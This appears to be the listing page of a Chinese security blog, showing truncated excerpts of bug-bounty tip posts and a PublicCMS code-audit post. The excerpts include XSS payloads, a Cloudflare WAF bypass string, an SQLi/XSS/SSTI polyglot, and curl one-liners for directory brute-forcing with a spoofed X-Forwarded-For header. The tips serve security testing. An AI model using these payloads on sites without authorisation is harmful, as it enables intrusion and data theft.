未分类

linux nohup screen

linux nohup screen
nohup 在后台运行命令,输出日志 #后台运行命令,输出日志到out.file nohup sh ./Recon.sh xxx.com > out.file 2>&1 & #打印最后10行,跟踪文件 tailf  out.file #显示当前系统的任务列表 jobs -l #结束任务 kill %pid   screen 命令行终端切换 #创建一个名……继续阅读 »

Admin 5天前 5浏览 0个赞

未分类

bugbountytip#5

bugbountytip#5
1、扫目录的时候加上XFF头可能会有奇效 cat urls.txt | xargs -n1 -I{} bash -c "cat ~/endpoints.txt | xargs -n1 -I[] curl --header 'X-Forwarded-For:127.0.0.1' -s -o /dev/null -w '%{http_code} {}[]\n' {}[]"|tee result.txt   2、……继续阅读 »

Admin 6天前 12浏览 0个赞

未分类

bugbountytip#4

bugbountytip#4
1、通过XSS动态生成PDF读取本地文件 文章地址:https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html 1.1发现参数中输入的标签在生成的pdf中解析 1.2 尝试使用iframe标签加载,但是没有内容 1.3 发现可以执行js   1.4  打印url地址发现file域   1.5 使用xh……继续阅读 »

Admin 1周前 (10-11) 12浏览 0个赞

未分类

无题

无题
记一今日犯傻事 下了个压缩包,然后使用命令unzip  -j file.zip 把压缩包全部解压到了根目录 根目录下大概就是这样子、 然后怎么回滚、不知道有啥操作 一个个删怎么可能 想个办法就是读取压缩包里面的文件名,然后匹配文件名进行删除 最后写了个shell把文件都删了,也不知道误删了没有,不管了   unzip -l chrome-linux.zip > files.txt while r……继续阅读 »

Admin 2周前 (10-10) 9浏览 0个赞

未分类

bugbountytip#3

bugbountytip#3
1、利用正则从js中获取参数名称,fuzz参数名使用 (?:const|let|var)\s+\K(\w+?)(?=[;.=\s])   2、目录暴力破解   cat alivehosts.txt | xargs -n1 -I{} bash -c "cat wordlist.txt | xargs -n1 -I[] curl -s -o /dev/null -w '%{http_code} {}……继续阅读 »

Admin 2周前 (10-08) 24浏览 0个赞

未分类

bugbountytip#2

bugbountytip#2
SQLi + XSS + SSTI payload '"><svg/onload=prompt(5);>{{7*7}}   XSS { Cloudfare } bypass: backblaze.com/blog/?s=</> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " ……继续阅读 »

Admin 3周前 (09-26) 26浏览 0个赞

未分类

bugbountytip#1

bugbountytip#1
1、SQL注入判断数据库类型 MySQL,MSSQL和Oracle为此分别具有不同的功能now(),getdate()和sysdate() 2、xss payload <video onloadstart="alert(1)"><source> 在firefox生效,chrome无效 <img/src="#"/onloadstart="alert(1)"/onloadend="aler……继续阅读 »

Admin 4周前 (09-25) 56浏览 0个赞

未分类

JAVA代码审计-PublicCMS-01

JAVA代码审计-PublicCMS-01
系统搭建好后,进入后台发现有登录日志记录,会记录登录成功/失败的用户ip、错误密码等信息 先看看是否存在xss   可以看到ip是从 X-Real-IP X-Forwarded-For 两个请求头中获取的,可以通过抓包伪造请求头插入非法字符,并且未做过滤写入到数据库中   直接查看数据库表中的内容,发现没有转义   但是输出的时候却被转义了   从技术架构了解到使用了f……继续阅读 »

Admin 2个月前 (09-03) 66浏览 0评论 0个赞